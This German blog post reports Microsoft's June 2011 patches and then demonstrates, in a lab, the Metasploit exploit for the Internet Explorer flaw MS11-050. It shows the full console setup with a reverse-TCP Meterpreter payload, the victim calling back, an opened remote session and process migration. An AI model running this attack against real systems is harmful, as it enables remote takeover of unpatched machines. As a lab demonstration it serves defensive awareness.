Beim Juni-Patchday 2011 hat Microsoft insgesamt 16 Patches herausgegeben, die 34 Sicherheitslücken betreffen. Dabei schließen 9 Patches kritische Sicherheitslücken, durch die Angreifer Code übers Netz ins System schleusen können. Weitere 7 Updates hält Microsoft immerhin noch für wichtig. Anwender der Software sollten schnellstmöglich reagieren, um nicht Opfer einer Attacke zu werden. en
Das Bulletin MS11-050 behebt die Schwachstellen im Internet Explorer der Versionen 6 bis 9. Ohne den entsprechenden Patch können sich Besucher einer verseuchten Webseite mit Schadcode infizieren.
Das Metasploit-Framework stellt einen Exploit zur Verfügung, der diese Schwachstelle ausnutzt. Im Folgenden wird der Angriff in einer Testumgebung simuliert. Als Zielsystem wird Windows XP SP3 und der Internet Explorer 7 genutzt.
Setup in der Metasploit-Konsole:
msf > use exploit/windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_mshtml_cobjectelement) > set URIPATH document
URIPATH => document
msf exploit(ms11_050_mshtml_cobjectelement) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms11_050_mshtml_cobjectelement) > set LPORT 4444
LPORT => 4444
msf exploit(ms11_050_mshtml_cobjectelement) > set LHOST 192.168.222.14
LHOST => 192.168.222.14
msf exploit(ms11_050_mshtml_cobjectelement) > show options
Module options (exploit/windows/browser/ms11_050_mshtml_cobjectelement):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH document no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.222.14 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Den Exploit starten und und warten bis sich das Ziel mittels Internet Explorer auf folgende URL verbindet:
http://192.168.222.14:8080/document
msf exploit(ms11_050_mshtml_cobjectelement) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.222.14:4444
msf exploit(ms11_050_mshtml_cobjectelement) > [*] Using URL: http://0.0.0.0:8080/document
[*] Local IP: http://192.168.222.14:8080/document
[*] Server started.
[*] Sending exploit for MS11-050 IE mshtml!CObjectElement Use After Free to 192.168.222.71:1029 (target: Win XP SP3 Internet Explorer 7)...
[*] Sending stage (749056 bytes) to 192.168.222.71
[*] Meterpreter session 1 opened (192.168.222.14:4444 -> 192.168.222.71:1030) at 2011-06-19 09:59:26 -0400
[*] Session ID 1 (192.168.222.14:4444 -> 192.168.222.71:1030) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (616)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1872
[*] New server process: notepad.exe (1872)
sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 FDCC_XP_VHDfrank @ FDCC_XP_VHD 192.168.222.14:4444 -> 192.168.222.71:1030
msf exploit(ms11_050_mshtml_cobjectelement) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: FDCC_XP_VHDfrank
meterpreter >
Im folgenden Video wird das Vorgehen in einer Testumgebung mit Backtrack5, Metasploit und Armitage gezeigt:
[youtube 5_1iJIBuROE]